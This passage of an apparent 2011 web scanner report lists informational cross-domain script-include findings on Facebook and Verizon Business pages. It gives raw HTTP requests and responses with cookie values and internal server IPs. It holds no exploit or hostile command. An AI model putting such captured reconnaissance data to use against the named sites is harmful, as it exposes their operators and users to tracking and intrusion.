<!-- SiteCatalyst code version: H.16.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://i.cmpnet.com/shared/omniture/h_s_code_remote.js"></script>
...[SNIP]...
<!-- research code -->
<script src="http://content.dl-rms.com/rms/mother/19171/nodetag.js"></script>
...[SNIP]...
<br />

<SCRIPT TYPE='text/javascript' LANGUAGE='JavaScript' SRC='http://twimgs.com/informationweek/elqNow/elqCfg.js'></SCRIPT>
<SCRIPT TYPE='text/javascript' LANGUAGE='JavaScript' SRC='http://twimgs.com/informationweek/elqNow/elqImg.js'></SCRIPT>
...[SNIP]...

16.30. http://www.facebook.com/connect/prompt_feed.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/prompt_feed.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /connect/prompt_feed.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.50
Connection: close
Date: Mon, 05 Sep 2011 22:36:09 GMT
Content-Length: 12409

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/connect\/prompt_feed.php";window._EagleEyeSeed="a2xk";</s
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yQ/r/JfaxZMmy8mJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

16.31. http://www.facebook.com/dialog/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/feed

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.54
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 14722

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="EcbK";</script><meta
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yQ/r/JfaxZMmy8mJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

16.32. http://www.verizonbusiness.com/Medium/about/promotions/first_6_months/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/about/promotions/first_6_months/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/about/promotions/first_6_months/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "62932d88f61687f6e484410ff7172a0e"
Last-Modified: Mon, 05 Sep 2011 22:36:31 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:32 GMT
Content-Length: 22487
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263391|VP%3d55|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:15 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.33. http://www.verizonbusiness.com/Medium/about/promotions/premium_data_center/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/about/promotions/premium_data_center/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/about/promotions/premium_data_center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:31 GMT
Server: Roxen/4.5.146-release3
ETag: "d7a0245de1dca5084bcaad7d1d441f84"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:31 GMT
Content-Length: 23185
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263391|VP%3d56|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:15 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.34. http://www.verizonbusiness.com/Medium/about/promotions/smp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/about/promotions/smp/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/about/promotions/smp/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:25 GMT
Server: Roxen/4.5.146-release3
ETag: "fa4aac09eac1b44b937f28b8ee8342f9"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:25 GMT
Content-Length: 25238
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263385|VP%3d54|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:09 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:25 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom" type="text/javascript"></script>
...[SNIP]...

16.35. http://www.verizonbusiness.com/Medium/bundles/vsbb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/bundles/vsbb/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/bundles/vsbb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "dbb3cfabe4229776e81ce03219b6376e"
Last-Modified: Mon, 05 Sep 2011 22:36:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263378|VP%3d49|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:02 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:18 GMT
Content-Length: 34610

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.36. http://www.verizonbusiness.com/Medium/products/conferencing/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/conferencing/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/products/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:27 GMT
Server: Roxen/4.5.146-release3
ETag: "682b2e7de0b0c4aafcb1f140c307ad94"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:27 GMT
Content-Length: 24168
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263387|VP%3d52|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:11 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:27 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.37. http://www.verizonbusiness.com/Medium/products/internet/ida/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/internet/ida/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/products/internet/ida/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:20 GMT
Server: Roxen/4.5.146-release3
ETag: "1ffc9ee9f2c2d58d7b4cf59683dda86b"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:21 GMT
Content-Length: 25699
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263380|VP%3d50|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:20 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.38. http://www.verizonbusiness.com/Medium/products/managed/managed_mobility/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/managed/managed_mobility/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/products/managed/managed_mobility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "377ad8868d28add230d79bce2286f6a6"
Last-Modified: Mon, 05 Sep 2011 22:36:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:25 GMT
Content-Length: 25367
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263385|VP%3d53|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:09 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:25 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.39. http://www.verizonbusiness.com/Medium/resources/vertical.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/resources/vertical.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/resources/vertical.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.13.9.1315279542633; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "8343e9725048ce298d7591f692b4ce95"
Last-Modified: Mon, 05 Sep 2011 22:27:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 35481
Date: Mon, 05 Sep 2011 22:27:10 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:27:10 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.40. http://www.verizonbusiness.com/Medium/sign-in/vec/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/sign-in/vec/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.5.9.1315279031192; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "5253d46cfeae5ec60b43ca341768ecf3"
Last-Modified: Mon, 05 Sep 2011 22:17:44 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 20846
Date: Mon, 05 Sep 2011 22:17:45 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262264|VP%3d5|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:21:28 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:17:44 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom" type="text/javascript"></script>
...[SNIP]...

16.41. http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/basic.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/sign-in/vec/basic.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.3.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "efabc9eb5d40da22e2cb4cf79593e04e"
Last-Modified: Mon, 05 Sep 2011 22:22:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 23484
Date: Mon, 05 Sep 2011 22:22:29 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:29 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom" type="text/javascript"></script>
...[SNIP]...

16.42. http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/essentials.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/sign-in/vec/essentials.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.2.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:14 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "9fc0b24323db5f76be4b1cfc3dd676c8"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 26281
Date: Mon, 05 Sep 2011 22:22:14 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:14 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.43. http://www.verizonbusiness.com/Medium/sign-in/vec/igus.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/igus.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/sign-in/vec/igus.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.6.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "10b85a197b72ecf9f7e34e76c23b568f"
Last-Modified: Mon, 05 Sep 2011 22:23:12 GMT
Vary: *
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 22693
Date: Mon, 05 Sep 2011 22:23:12 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:23:12 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.44. http://www.verizonbusiness.com/Medium/sign-in/vec/looking.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/looking.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/sign-in/vec/looking.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.10.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "fc491c0b43858ff0d9914c34c0d12332"
Last-Modified: Mon, 05 Sep 2011 22:25:31 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 21785
Date: Mon, 05 Sep 2011 22:25:31 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:25:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom" type="text/javascript"></script>
...[SNIP]...

16.45. http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/network.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/sign-in/vec/network.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.2.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:18 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "6b7625234ff33f97a48e6869288d96f4"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 23376
Date: Mon, 05 Sep 2011 22:22:18 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:18 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.46. http://www.verizonbusiness.com/Medium/sign-in/vec/voip.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/voip.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/sign-in/vec/voip.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.5.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:42 GMT
Vary: *
